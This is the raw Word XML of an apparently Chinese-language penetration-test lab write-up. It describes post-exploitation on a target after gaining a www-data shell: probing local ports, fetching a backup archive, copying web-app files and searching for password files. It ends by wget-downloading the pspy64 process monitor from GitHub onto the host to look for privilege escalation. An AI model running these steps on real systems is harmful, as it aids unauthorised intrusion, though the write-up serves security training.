    <w:p w14:paraId="61773AE0" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C22BFC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253218D" wp14:editId="0B55C5DF">
            <wp:extent cx="5274310" cy="3317240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16938306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0654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7639" w14:textId="13639001" w:rsidR="00C22BFC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</w:p>
    <w:p w14:paraId="05A3A7CA" w14:textId="77777777" w:rsidR="00062BD2" w:rsidRPr="000260F7" w:rsidRDefault="00062BD2" w:rsidP="00062BD2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开放端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72689445" w14:textId="43F2699A" w:rsidR="00062BD2" w:rsidRDefault="00062BD2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ss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unal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端口开放信息，发现存在一个只能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本地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3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>），其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是数据库端口</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，在前文以及登录查看过。而</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好像是一个</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。尝试</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入命令</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>curl 127.0.0.1:8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问该端口，</w:t>
      </w:r>
      <w:r w:rsidR="00C22BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>此处提示存在一个压缩的备份文件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68801805" w14:textId="77777777" w:rsidR="00D02617" w:rsidRDefault="001043D1" w:rsidP="00062BD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接下来我们尝试查看该压缩文件的内容，由于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在大多数位置是没有写权限的，因此利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cd 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进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目录，在此处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是由写权限的。然后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wge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127.0.0.1:8000/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kup.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下载该压缩文件，并利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unzip backup.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解压缩该文件，得到一个文件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igitcode.bak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用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cat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igitcode.bak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该文件发现它指示了一个网站，网站根目录在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/var/www/code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55C22F75" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C22BFC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7A8E1725" wp14:editId="618BB645">
            <wp:extent cx="5274310" cy="1142365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="745945600" name="图片 1" descr="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5600" name="图片 1" descr="文本, 聊天或短信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2BB4" w14:textId="00408E80" w:rsidR="00C22BFC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</w:p>
    <w:p w14:paraId="33BEE45F" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00C22BFC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07A58DB" wp14:editId="48D1A2D9">
            <wp:extent cx="4781550" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14717146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4662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366" w14:textId="617CB5AD" w:rsidR="00C22BFC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</w:p>
    <w:p w14:paraId="22BFEA32" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="001043D1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00483599" wp14:editId="264656DB">
            <wp:extent cx="5274310" cy="5179060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="19053663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6373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7B8" w14:textId="1854AA2B" w:rsidR="00440B55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14:paraId="137CE665" w14:textId="24D0A4FD" w:rsidR="00D02617" w:rsidRDefault="00D02617" w:rsidP="001043D1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/var/www/code/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下文件的权限，是可以被任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用户读取的，由于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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/vat/www/html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下有写权限，可以将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code/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下内容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复制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下查看。先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kdi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/var/www/html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code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>建立一个目录存放文件，然后输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cp -r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dpmAp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troll.jpg /var/www/html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code/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将文件复制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code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下。然后在浏览器中访问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dex.ph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将压缩文件中得到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00B90427" w:rsidRPr="00B90427">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidR="00B90427" w:rsidRPr="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>49414720352567</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入，会跳转到一个登录页面，但是此处登录也没有用，因为已经获得了</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的权限，该网站也是以</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份运行的，即使</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击此</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网页也还是得到</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户的</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，只能通过在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>qdpmApp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B90427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中搜索文件查看是否有敏感信息才有可能提升权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318B8EC5" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00D02617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77053845" wp14:editId="69B6AD4B">
            <wp:extent cx="5274310" cy="1115060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="17575438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3804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0C6" w14:textId="6CDE17B1" w:rsidR="00D02617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</w:p>
    <w:p w14:paraId="672E5477" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00D02617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12FD952" wp14:editId="582E83C7">
            <wp:extent cx="5274310" cy="1297305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10814013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01357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884" w14:textId="361F5D46" w:rsidR="00D02617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</w:p>
    <w:p w14:paraId="174D57B1" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00D02617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9B9AAD" wp14:editId="76FC8190">
            <wp:extent cx="5274310" cy="1873885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="42672905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9051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095" w14:textId="4D10CFC0" w:rsidR="00D02617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</w:p>
    <w:p w14:paraId="5CCD614F" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00B90427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B126C51" wp14:editId="1B959487">
            <wp:extent cx="5274310" cy="2327910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="36311034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0342" name="图片 1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2E" w14:textId="1E9FE191" w:rsidR="00D02617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</w:p>
    <w:p w14:paraId="5EE2D1B9" w14:textId="222E3998" w:rsidR="00337474" w:rsidRDefault="00337474" w:rsidP="001043D1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 w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>qdpmApp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -name *pass* -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>qdpmApp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>name *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00337474">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>* -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查找和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user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pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>相关的文件</w:t>
      </w:r>
      <w:r w:rsidR="008C3358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，均未找到敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A057E" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="008C335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126C761" wp14:editId="4F080ACA">
            <wp:extent cx="5274310" cy="2059305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="34027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717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2C5" w14:textId="702C5B65" w:rsidR="008C3358" w:rsidRDefault="00E95DF6" w:rsidP="00E95DF6">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia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</w:p>
    <w:p w14:paraId="46A51D4F" w14:textId="2605EC66" w:rsidR="00AD069F" w:rsidRPr="00AD069F" w:rsidRDefault="00AD069F" w:rsidP="00AD069F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 w:hint="eastAsia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其它攻击尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47623A10" w14:textId="5BAE7C8F" w:rsidR="00AD069F" w:rsidRDefault="00AD069F" w:rsidP="00AD069F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前文中通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口获得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是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的，也就是说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口是以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用户身份运行的，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口也运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是以什么身份运行呢？如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口是以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身份运行的，就可以通过向网站根目录下写入文件访问执行进行提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF277E" w14:textId="7CEB79AB" w:rsidR="00440B55" w:rsidRPr="00AD069F" w:rsidRDefault="00AD069F" w:rsidP="00AD069F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因此需要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sp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输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cd 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m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后以下载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sp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wge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hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidRPr="00F23AAB">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
